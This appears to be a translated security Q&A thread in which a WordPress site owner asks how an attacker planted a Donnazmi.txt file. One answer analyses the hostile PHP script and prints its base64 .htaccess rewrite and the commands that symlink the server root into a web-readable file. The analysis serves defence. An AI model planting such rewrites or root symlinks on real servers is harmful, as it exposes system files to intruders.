¿Cómo obtuvo acceso el hacker a mi carpeta de carga de WordPress? [cerrado]

2

Ayer descubrí que hay este enlace en el servidor de mis amigos. Quiero saber cómo pudo el hacker subirlo allí. Leí las preguntas similares pero no pude encontrar una respuesta correcta.

EDITAR: -

Hoy me enteré de que el sitio de WordPress ha sido violado por la contraseña (la contraseña es segura). Todavía no sé cómo lograron descifrar esa contraseña.

Después de descifrar la contraseña, iniciaron sesión y cargaron los archivos php. Después de buscar en Google sobre Donnazmi.txt, descubrí que muchos otros sitios también se piratean el mismo día (o el 13 de julio). Los hacks que utilizan el mismo script todavía están en marcha. La contraseña del servidor de WordPress se ha cambiado a una más compleja y esos archivos php se han eliminado.

Gracias por las respuestas y comentarios. Lo siento, debería haber dado más información al publicar la pregunta.

    
pregunta Sai Krishna 05.08.2015 - 19:38
fuente

2 respuestas

6

Una vez que el archivo se haya cargado en el servidor ( explotando un error en un tema de wordpress ) , el .htaccess se reconfigura de manera que el servidor interpretará cualquier archivo .txt como una secuencia de comandos .php y seguirá los enlaces simbólicos.

El siguiente paso es el truco, él hace un enlace simbólico de / a Donnazmi.txt (2 maneras)

El código no es realmente complejo, imprime un formulario html con las configuraciones necesarias para ejecutar los pasos de explotación (es necesario enviar una solicitud de publicación con Donnazmi como clave de publicación para verlo).

Código explicado:

.htaccess reconfig:

$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';

Esta es una cadena codificada en base64, que se traduce en:

Options Indexes FollowSymLinks   
DirectoryIndex ssssss.htm        
AddType txt .php                 
AddHandler txt .php              

Así que con esa configuración:

$file = fopen(".htaccess","w+"); // open the file
$write = fwrite ($file ,base64_decode($fvckem)); 
// write the new config inside the file

enlaces simbólicos:

// 1. this is a link with the linux comand 'ln'
system('ln -s / Donnazmi.txt');
// 2. this is a link php native function
$Donnazmi = symlink("/","Donnazmi.txt");

Después de la ejecución, cada vez que visita example.com/Donnazmi.txt ve una lista del directorio raíz de su servidor ( Options Indexes tm).

Así que sí, reconstruye esa máquina. y compruebe el software antes de instalarlo.

    
respondido por el jmingov 06.08.2015 - 03:52
fuente
1

El video que encontré fue lo primero que apareció cuando busqué en Google el nombre del pirata informático.

¿Tienes el tema de Wordpress Cold Fusion instalado por casualidad?

Aquí está el llamado video del Ataque de Mauritania sobre cómo explota el tema específico de WordPress para cargar archivos en el servidor.

    
respondido por el LazyHands 05.08.2015 - 20:24
fuente

Lea otras preguntas en las etiquetas